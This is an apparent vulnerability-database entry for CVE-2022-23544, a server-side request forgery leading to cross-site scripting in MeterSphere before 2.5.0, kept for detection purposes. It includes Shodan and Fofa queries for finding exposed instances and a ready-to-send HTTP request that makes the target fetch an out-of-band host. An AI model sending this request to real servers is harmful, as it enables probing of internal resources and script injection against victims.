🔙 목록으로 돌아가기

CVE-2022-23544: MeterSphere < 2.5.0 SSRF

TitleMeterSphere < 2.5.0 SSRF
Authorj4vaovo
SeverityMedium
ImpactAn attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure.
RemediationUpgrade MeterSphere to version 2.5.0 or later to mitigate the SSRF vulnerability.
CVSS Score6.1
EPSS Score0.23569
CVE IDCVE-2022-23544
CWE IDCWE-918,CWE-79
Shodan Queryhtml:"metersphere"http.html:"metersphere"
Fofa Querytitle="MeterSphere"body="metersphere"title="metersphere"
Tags cve2022 cve metersphere ssrf oast xss vuln

🔍 Vulnerability Description

MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in IssueProxyResourceService::getMdImageByUrl allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere’s origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds.

🌐 HTTP Request

GET /resource/md/get/url?url=http://oast.pro HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-23544.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-23544.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A